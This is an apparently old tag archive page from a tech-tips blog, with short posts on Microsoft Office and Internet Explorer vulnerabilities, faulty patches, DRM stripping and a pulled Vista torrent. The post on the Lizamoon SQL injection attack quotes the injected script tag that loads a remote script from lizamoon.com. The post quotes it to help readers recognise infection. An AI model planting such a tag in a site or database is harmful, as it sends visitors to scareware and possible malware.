Computer Tips -Tech Info

Tag: MS

  • The Great Lizamoon SQL Injection Attack – March-April 2011

    Well – Friday things started getting interesting on tech news sites. Most sites were running phony April fools stories and a few including websense was running with a major attack going on against many SQL based websites. Details were sketchy – people were told to look for ur.php files in their web directory (which isn’t exactly a good test to see if your site has been infected by this SQL injection…) “<script src=http://lizamoon.com/ur.php”> is an example of the code that is inserted into sql databases and what it basically does is force visitors to visit a scareware site where malware may be installed onto their computer that claims they have a virus…. (how many of those have we seen in the last 5-10 years?)

    One of my annoyances with tech news (and especially virus news) coverage is that when a story gets big enough to be covered by the big media, they never do it justice. I want information. What is this attacking? What programs are vulnerable, is there a pattern?

    (more…)

  • Oh and ANOTHER Powerpoint vulnerability too….

    Sometimes you feel like the little Dutch boy of myth/legend with his finger trying to plug the hole in a dam…. Incidents bring us this as well…. another powerpoint vulnerability seems to have been disclosed. MS has an advisory. All currently supported Office versions are vulnerable (even on Mac?) Workarounds include not opening powerpoint files… using the Powerpoint viewer 2003 (I don’t see any word on opening in something like Openoffice.org Impress – that MAY mitigate the risk.)

    (more…)

  • How Microsoft could patch VML vulnerability before October’s patch day

    SO, there’s the second big vulnerability exploit for Internet Explorer making the rounds in about a week and Microsoft’s advisory says that the most recent flaw will likely be patched on October’s patch day (“unless the need arises…”) So, what would trigger that need? Lot’s of browsers being subjected to unwanted drive-by downloads? I suppose that doesn’t trigger need for an out of cycle patch. True, “lot’s” is hard to quantify – how many people are really affected by this, home users? office users? etc. After all there IS a way to mitigate this (unregistering the vml dll….) not for the faint of heart but, it’s your computer and you’re responsible for it, right? Last month, a program offered people the capability of removing DRM from Microsoft DRM protected windows media files… it took about 3 days for Microsoft to release a fix…..

    (more…)

  • Internet Explorer zero-day

    This time around, the zero day is related to Internet Explorer and activex… (directanimation specifically). Incidents has a good update on the issue. This is a second exploit, there was another at the end of August, MS has an advisory on the issue. I think a safe bet would be alternative browsers until this is patched. It is possible though to enable a kill bit, or vary security settings to disable/always prompt before using activex.

  • ANOTHER Microsoft patch problem

    This is getting to be like clockwork, but it sounds like this may be one of the nastiest problems so far. It appears that there is a problem with one of the recent patches from Microsoft MS06-49. It looks as though the problem is data corruption for small files (under 4096 bytes.) There’s a google groups thread here. The key factor seems to be that IF the folder is compressed, the data within is subject to this possible corruption.

    (more…)

  • Fairuse4wm back on top

    In the struggle between fairuse4wm and Microsoft DRM, it appears that fairuse4wm is out on top again. Just to sum up – the last few weeks saw a release of fairuse4wm that stripped DRM from Microsoft DRM protected media files, then MS fixed their DRM to break fairuse4wm and now fairuse4wm has released a NEW version that breaks Microsoft’s fix and strips DRM from Microsoft DRM protected media files…. DRM software arms race, kind of fun to watch.

  • MS patch problems

    Sans has updated their chart that illustrates Microsoft’s August patches. They’ve updated it to give information about the problems that have been reported with now 2 of this months patches (MS06-040 and MS06-042) as well as what fixes are available.

  • Other MS patch news as well as a Yahoo vulnerability?

    Or lack of currently available patch as the case may be. From the previous link it appears that there was at least one previously announced vulnerability that was not addressed in the recent patch day from Microsoft. From MS…

    “this is a DoS only issue that was not addressed in MS06-040, but will be addressed in a bulletin.”

    Not timeline yet on when… There are also public exploits out for (possibly related to MS06-046) which is related to the MS Help system.

    (more…)

  • Another Microsoft Office Vulnerability

    Hot on the heels of the Microsoft Word patch there’s a new threat to Microsoft Office. This vulnerability is with Excel documents. According to the MS security response center blog, they’ve received one report of a system being attacked by a previously unknown vulnerability in Excel. The moral of the story is to be suspicious of any attachments, be they programs, or claim to be images, word documents, excel documents, fluffy bunnies or what…. If you weren’t expecting an attachment in email wait and find out if it’s legit through other channels.

    (more…)

  • Vista torrent pulled

    Several days ago I mentioned vistatorrent.com that had copied the Windows Vista download into a bittorrent tracker and allowed bittorrent downloads of the DVD iso. Well, they’ve received a cease and desist order as thanks for their efforts. Some are saying the fact that the download servers are slammed to the point MS is recommending that people order the DVD for a shipping charge is proof that Windows Vista is eagerly anticipated and that the response trumps any open source release. Well, ok – I’ve got to say I was interested to see it for all the press it’s been getting (and I’m sure WILL get), and in 12 months I’ll likely be trying to support it, so I wanted to dip the toes in now. I don’t plan on running it on a desktop myself. In fact the last 24 hours I’ve been on a quest to install it in a virtual machine and I’ll pass along details of that in another post.

    (more…)